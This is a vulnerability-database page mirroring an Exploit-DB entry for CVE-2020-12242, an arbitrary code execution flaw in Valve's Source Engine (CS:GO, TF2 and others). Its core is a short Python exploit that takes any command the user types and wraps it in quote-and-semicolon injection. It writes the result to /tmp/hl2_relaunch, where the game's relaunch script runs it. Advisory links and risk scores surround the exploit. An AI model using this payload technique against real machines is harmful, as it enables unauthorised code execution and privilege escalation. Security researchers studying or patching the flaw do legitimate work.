Lucene search
K

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution

🗓️ 27 Apr 2020 00:00:00Reported by 0xEmmaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 183 Views

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution. Exploit by 0xEmma/BugByte/SebastianP

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Counter-Strike CS:GO BuildID: 4937372 - Arbitrary Code Execution Exploit
27 Apr 202000:00
zdt
CNVD
Valve Source Elevation of Privilege Vulnerability
28 Apr 202000:00
cnvd
CVE
CVE-2020-12242
27 Apr 202014:56
cve
Cvelist
CVE-2020-12242
27 Apr 202014:56
cvelist
EUVD
EUVD-2020-4557
7 Oct 202500:30
euvd
NVD
CVE-2020-12242
27 Apr 202015:15
nvd
Packet Storm
Source Engine CS:GO Build 4937372 Arbitrary Code Execution
27 Apr 202000:00
packetstorm
Prion
Design/Logic Flaw
27 Apr 202015:15
prion
RedhatCVE
CVE-2020-12242
22 May 202515:54
redhatcve
# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Date: 2020-04-27
# Exploit Author: 0xEmma/BugByte/SebastianPC
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : CVE-2020-12242

import os, random, sys
banner = """
:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
 ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
"""
print(banner)


if os.name == "posix":
    command = str(input("Code to run? "))
    payload = '"; ' + command + '; echo "'
    f = open("/tmp/hl2_relaunch", "w")

    f.write(payload)
    f.close()

if os.name == "nt":
    print("Windows based OS's not supported, see CVE-2020-12242")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2020 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
CVSS 3.17.8
EPSS0.0039
183